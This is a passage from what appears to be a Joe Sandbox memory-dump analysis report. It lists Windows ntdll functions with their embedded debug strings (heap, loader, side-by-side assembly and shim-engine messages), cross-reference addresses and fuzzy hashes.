About to reallocate block at %p to %Ix bytes, xrefs: 01AF03BA
Just reallocated block at %p to %Ix bytes, xrefs: 01AF05F1
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 01AF069F
HEAP: , xrefs: 01AF03A6, 01AF04B5, 01AF05DD, 01AF0682, 01AF06D9

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 03b99c75c99b94f68b9c170a7fefe07ac5148c9de70f4222ecafd5f423676e25
Instruction ID: 9e8df848e365c5802c24016bb463ba37e0a7d9b064209bcad606af266777a2ee
Opcode Fuzzy Hash: 03b99c75c99b94f68b9c170a7fefe07ac5148c9de70f4222ecafd5f423676e25
Instruction Fuzzy Hash: 77D1CC35600686EFDB22DFA8C641AAEBBF2FF8A700F08805DF6459B252C774D941CB14

Uniqueness

Uniqueness Score: -1.00%

Function 01AC89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

HandleTraces, xrefs: 01AC8C8F
AVRF: -*- final list of providers -*- , xrefs: 01AC8B8F
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01AC8A3D
VerifierDlls, xrefs: 01AC8CBD
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01AC8A67
VerifierDebug, xrefs: 01AC8CA5
VerifierFlags, xrefs: 01AC8C50

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: edddbf220799532909be72c8d52808bf45fe53ba709eb15a55cb65c579af932a
Instruction ID: b829c6e63f31a317d782e695365b960be621d2849c4a131ec0f04b49981983a3
Opcode Fuzzy Hash: edddbf220799532909be72c8d52808bf45fe53ba709eb15a55cb65c579af932a
Instruction Fuzzy Hash: 099122B2645712AFD722DF6CD980B6BBBA8BB94F14F06045CFA406B240C778AD14CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01A4EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

LdrpResSearchResourceInsideDirectory Enter, xrefs: 01A4EB58
LdrpResSearchResourceInsideDirectory Exit, xrefs: 01A4EB6C
{, xrefs: 01AA4643
R, xrefs: 01A4EB62
T, xrefs: 01A4EB4E
, xrefs: 01A4F299

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 158bcdbdd2f3372ccf201190910a5e7b39f03426e5fc6481c4ffe262e96cc939
Instruction ID: e43906015d67e41a1b5869b4e37331c776b50e7cc2eff78245fdf36a5e25e48a
Opcode Fuzzy Hash: 158bcdbdd2f3372ccf201190910a5e7b39f03426e5fc6481c4ffe262e96cc939
Instruction Fuzzy Hash: 7AA25D70A0562ACFDB64CF18CD887A9BBB1BF89304F5842D9E50DA7251DB749E85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 01A763FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 01AB40D8
Delaying execution failed with status 0x%08lx, xrefs: 01AB4258
_LdrpInitialize, xrefs: 01AB40DF, 01AB4141, 01AB4205, 01AB425F
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 01AB41FE
minkernel\ntdll\ldrinit.c, xrefs: 01AB40E9, 01AB414B, 01AB420F, 01AB4269
Process initialization failed with status 0x%08lx, xrefs: 01AB413A

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 7b21daed9c674314e17621afc92493d8911484ed17681b2e641dd3def049fa25
Instruction ID: 90fa1eb2500d3282a619aad99b65d488aaec27c042f63037e64eb451fb83ab92
Opcode Fuzzy Hash: 7b21daed9c674314e17621afc92493d8911484ed17681b2e641dd3def049fa25
Instruction Fuzzy Hash: C0914870B00795EBEB35DF18EE84BEE7BA9BF44B24F040129E9096B283D7749911C791

Uniqueness

Uniqueness Score: -1.00%

Function 01A3645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 01A36496
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01A999ED
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01A99A01
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01A99A2A
minkernel\ntdll\ldrinit.c, xrefs: 01A99A11, 01A99A3A
LdrpInitShimEngine, xrefs: 01A999F4, 01A99A07, 01A99A30

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 857b8fc83a6442e9f7194201813609fae324129cdf9352fd25eab9d6186574e7
Instruction ID: 17a3fc74a9d7aec57e2a64afbee97c51bcf843999d41bada37feeec3afac3d88
Opcode Fuzzy Hash: 857b8fc83a6442e9f7194201813609fae324129cdf9352fd25eab9d6186574e7
Instruction Fuzzy Hash: FE51B371208305AFEB25DF24C941FAB77E8FB84748F04091EF5899B561D734EA45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01A7C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Unable to build import redirection Table, Status = 0x%x, xrefs: 01AB81E5
LdrpInitializeProcess, xrefs: 01A7C6C4
minkernel\ntdll\ldrinit.c, xrefs: 01A7C6C3
Loading import redirection DLL: '%wZ', xrefs: 01AB8170
LdrpInitializeImportRedirection, xrefs: 01AB8177, 01AB81EB
minkernel\ntdll\ldrredirect.c, xrefs: 01AB8181, 01AB81F5

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: fb1064188ce13c1b502535a7cb78c0903c4ae2d039ba98099b3c2420a33d2796
Instruction ID: de8a34e043a1de2d7f60c720d0626032934cc21d4fd0fd4a2c03f418d40cb537
Opcode Fuzzy Hash: fb1064188ce13c1b502535a7cb78c0903c4ae2d039ba98099b3c2420a33d2796
Instruction Fuzzy Hash: 78311571644342AFC220EF6CDE86E6B77E8FF95B20F04051CF944AB295E624ED04C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 01A72674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context, xrefs: 01AB2165
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01AB21BF
RtlGetAssemblyStorageRoot, xrefs: 01AB2160, 01AB219A, 01AB21BA
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01AB2180
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01AB2178
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01AB219F

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: b6d88a9c09eb8ced4c26f7040f1e1f03e0a686f14a06c05744d8347bc97589aa
Instruction ID: 7f1d51f7aa31cc18e3a93b8d21779e989f04d7d8fd259a3fc799cac2786bd71c
Opcode Fuzzy Hash: b6d88a9c09eb8ced4c26f7040f1e1f03e0a686f14a06c05744d8347bc97589aa
Instruction Fuzzy Hash: 8D310936B403657BE7218B999D81F9BBA7DEB64A50F09005FFB04BB241D270AB01C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 01A8096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01A82DF0: LdrInitializeThunk.NTDLL ref: 01A82DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A80BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A80BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A80D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A80D74

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 3935a6a4113724b9190029c0e186ff803ca180d7c9bdbffd18bcafe8811f11b1
Instruction ID: 03654a9450d912b46eeddf4d7488719f019c8a829d427043fd7746e7ac81077b
Opcode Fuzzy Hash: 3935a6a4113724b9190029c0e186ff803ca180d7c9bdbffd18bcafe8811f11b1
Instruction Fuzzy Hash: D9427DB1900705DFDB61DF28C980BAABBF4FF04314F1445AAE989EB242D770A985CF60

Uniqueness

Uniqueness Score: -1.00%

Function 01A4A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Enter, xrefs: 01A4A3EF
LdrResFallbackLangList Exit, xrefs: 01A4A3FF
6, xrefs: 01A4A3F7
8, xrefs: 01A4A3E7

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 7e85807660df57a6fb470227778f9e95d5f63731446e2629e4cd17015f0f700b
Instruction ID: 87555f7db126c3711c363f0d73ceafd37cf542534d0fd8f05cbae0f49ace2b5b
Opcode Fuzzy Hash: 7e85807660df57a6fb470227778f9e95d5f63731446e2629e4cd17015f0f700b
Instruction Fuzzy Hash: B3C16875148382CFD721DF68C244B6AB7F4BFC4704F04896AF9968B251E734CA49CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 01A78402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 01A78422
@, xrefs: 01A78591
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01A7855E
minkernel\ntdll\ldrinit.c, xrefs: 01A78421

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 9f1f3a6b18226c5e541b7cec273841528a27998e7dcdba39c4ef3b1485484d1d
Instruction ID: 9a551065562cff0db1ba01d942b2b5654dabc0be0e700765ca1584b94858e7f6
Opcode Fuzzy Hash: 9f1f3a6b18226c5e541b7cec273841528a27998e7dcdba39c4ef3b1485484d1d
Instruction Fuzzy Hash: CD919A71508345AFD722EF25CD84FABBAECBF84744F40092EFA8492151E334DA04CB62

Uniqueness

Uniqueness Score: -1.00%

Function 01A7273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01AB22B6
.Local, xrefs: 01A728D8
SXS: %s() passed the empty activation context, xrefs: 01AB21DE
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01AB21D9, 01AB22B1

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: eaa59e5afa70a72a707d6f3248fb5b7884406536671f098c9a1fe6f30582b59a
Instruction ID: fd045bf2c7d368ab688ec04ffbbcea7d15e2fa53a33487adeeb2863db8f15454
Opcode Fuzzy Hash: eaa59e5afa70a72a707d6f3248fb5b7884406536671f098c9a1fe6f30582b59a
Instruction Fuzzy Hash: 71A19E3194022A9BDB25CF68DC84BA9B7B5BF58354F1941EBD908EB251D730AF81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01A74AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

RtlDeactivateActivationContext, xrefs: 01AB3425, 01AB3432, 01AB3451
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01AB3456
SXS: %s() called with invalid flags 0x%08lx, xrefs: 01AB342A
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01AB3437

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: 7e02d1755121cf1107ffe9b25e27c16e56f65c719002219c56403fe2e6f46726
Instruction ID: 1b42440192c7ae87ae15d42cd85bde57ec215dc9b717c8136a44b5ed73758ce2
Opcode Fuzzy Hash: 7e02d1755121cf1107ffe9b25e27c16e56f65c719002219c56403fe2e6f46726
Instruction Fuzzy Hash: E6612136600752AFDB22CF1DCC81B7AB7E9BF88B51F188529E8559B242D734ED01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01A464AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01AA1028
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01AA10AE
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01AA0FE5
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01AA106B

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: d0379f40ea2463c1780ffe6734441a1e7d801c7f84612ad59ab1210946ad590a
Instruction ID: a7b771821629edf3000d29a353861d70d3052d0040bcb51b32ffbfef16ba2974
Opcode Fuzzy Hash: d0379f40ea2463c1780ffe6734441a1e7d801c7f84612ad59ab1210946ad590a
Instruction Fuzzy Hash: 0971E0B1904345AFCB21EF28C984BAB7FE8AF95764F440468F9498B246D734D588CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 01A6245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 01A62462
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01AAA992
minkernel\ntdll\ldrinit.c, xrefs: 01AAA9A2
LdrpDynamicShimModule, xrefs: 01AAA998

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 0fe5e2589b9b12a54e7557de5f508d3b98e7371b29b1a23277535e59a3d79a60
Instruction ID: f49cb36db85cab3ffccb3df14150edb411fa529fac8b52c3b351290946bb0166
Opcode Fuzzy Hash: 0fe5e2589b9b12a54e7557de5f508d3b98e7371b29b1a23277535e59a3d79a60
Instruction Fuzzy Hash: C3315772A00202EBDB319F5DD985FBE7BF8FB84B00F56401AE911AB255C7B49951C780

Uniqueness

Uniqueness Score: -1.00%

Function 01A529A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01A5327D
HEAP[%wZ]: , xrefs: 01A53255
HEAP: , xrefs: 01A53264

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: f63884dc23a6c938853aa3f6faec51a03e4ae134c94608790b9f2bf8309928d5
Instruction ID: 0ae50561082365c7b10dea54f0a18f259a2beb442dda3c8506ffa91a75e922d8
Opcode Fuzzy Hash: f63884dc23a6c938853aa3f6faec51a03e4ae134c94608790b9f2bf8309928d5
Instruction Fuzzy Hash: 3E92AB71A08249DFDB65CFA8C4407AEBBF1FF88310F18809AE959AB352D735A945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01A50770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 01AA50CA
HEAP[%wZ]: , xrefs: 01AA50AE
HEAP: , xrefs: 01AA50BD

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 3c8e52f2338eb2fdbfc5f9869fe79798c3edce3ebabfde8006828654f44679fb
Instruction ID: b1b8f8d50ac8f462654c532ccc5fdf5ba63496df93c8341e8c1031d3b97db686
Opcode Fuzzy Hash: 3c8e52f2338eb2fdbfc5f9869fe79798c3edce3ebabfde8006828654f44679fb
Instruction Fuzzy Hash: 63F19D70A04606DFEB66CF68CA84B6ABBF5FF44304F1441A8F9169B385D734E941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01A66962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

, xrefs: 01AACA51
@, xrefs: 01A66C24

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: f3d63b73f0cd6573e82d77978adc1a53843a40ff847d192960659263896334fd
Instruction ID: 3961a1848345ad125845e0d3cab706992e2396108b6ac4449c7d3772459a3db1
Opcode Fuzzy Hash: f3d63b73f0cd6573e82d77978adc1a53843a40ff847d192960659263896334fd
Instruction Fuzzy Hash: 2DC280716183419FEB25CF68C881BABBBE9BF88754F08892DF999C7241D734D844CB52

Uniqueness

Uniqueness Score: -1.00%

Function 01A3A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 01A9C1E4
FilterFullPath, xrefs: 01A9C2E6
UseFilter, xrefs: 01A3A1C1

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 92922e7a6a9c420ce7c2ecfae624a9447160fdc50750d9395c937a4463726d9e
Instruction ID: 70219becd742806506efab4c791c5288938af7afa9328d78ddc10d325d854c98
Opcode Fuzzy Hash: 92922e7a6a9c420ce7c2ecfae624a9447160fdc50750d9395c937a4463726d9e
Instruction Fuzzy Hash: 4DA169759116299BDF31AF68CD88BAAB7F8EF48710F1001EAE909A7250D7359EC4CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01A60BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01AAA121
Failed to allocated memory for shimmed module list, xrefs: 01AAA10F
LdrpCheckModule, xrefs: 01AAA117

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: 81619d02fad0e65d52a3783fea727a73ddf7ced347ebf66b46d9bb2d901173f5
Instruction ID: 94befa1af7960ad766eaffc61f7af2aa8f6f7b14d510dfde7ea4af2c1d264088
Opcode Fuzzy Hash: 81619d02fad0e65d52a3783fea727a73ddf7ced347ebf66b46d9bb2d901173f5
Instruction Fuzzy Hash: 0C71C271A00205EFDB25DF68CA84ABEB7F8FB88704F18446DE906DB255D734AE91CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01A7C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

Failed to reallocate the system dirs string !, xrefs: 01AB82D7
LdrpInitializePerUserWindowsDirectory, xrefs: 01AB82DE
minkernel\ntdll\ldrinit.c, xrefs: 01AB82E8

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 2cc27d7f7af4a4efb5b863a9585037fffb02decd6f536d2ecc4ad776c48f2ac6
Instruction ID: 234df8a5283b1df502c2903f6bf882a500052c7d5436339a78d7d29dc38e294f
Opcode Fuzzy Hash: 2cc27d7f7af4a4efb5b863a9585037fffb02decd6f536d2ecc4ad776c48f2ac6
Instruction Fuzzy Hash: EA41E2B1544302ABC721EB68DE81B9FBBECAF84760F04492AF948D3255EB74D9108B91

Uniqueness

Uniqueness Score: -1.00%

Function 01AFC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 01AFC1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01AFC1C5
PreferredUILanguages, xrefs: 01AFC212

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: b445a86cf6765552307bd223af08fdaf77e736177ebe79f64d04b9cd0a3478ea
Instruction ID: a43f16ee39345dbb9cc86b272c8888290c9282dd67eef04a11cad9c23e9ee365
Opcode Fuzzy Hash: b445a86cf6765552307bd223af08fdaf77e736177ebe79f64d04b9cd0a3478ea
Instruction Fuzzy Hash: B7416F76E1020EEBDB11EBD9C981FEEBBB8EB54710F14406AFA09A7244D7749A44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01AD4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

@, xrefs: 01AD4225
LdrpResValidateFilePath Exit, xrefs: 01AD4172
LdrpResValidateFilePath Enter, xrefs: 01AD4160

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 8408e926192e77032244070c456fe784cbf544c80bd82bdce042867e9d36c07e
Instruction ID: 43d1e145916367208c9aef0acc7334df7f660bbfc7748b16105b33291a6a550b
Opcode Fuzzy Hash: 8408e926192e77032244070c456fe784cbf544c80bd82bdce042867e9d36c07e
Instruction Fuzzy Hash: 05412832904B598FEB25DBE9C944BADBBF4FF59340F140459E902EBB81D7348901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01AC4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01AC4888
LdrpCheckRedirection, xrefs: 01AC488F
minkernel\ntdll\ldrredirect.c, xrefs: 01AC4899

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 60c41a0b4083861e539483d1c1ea6c060be4a5caa3e6cbc33347166a64adb073
Instruction ID: 01ec989d674afb2d08c49d1cb23500e530f0bc5fe14f12506a1ec6ff7b7d075d
Opcode Fuzzy Hash: 60c41a0b4083861e539483d1c1ea6c060be4a5caa3e6cbc33347166a64adb073
Instruction Fuzzy Hash: A0419E32A046519BCB22CF6DD960A677BE4BF8DE50B09056DED48AB215D730D810CB99

Uniqueness

Uniqueness Score: -1.00%

Function 01A50BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings
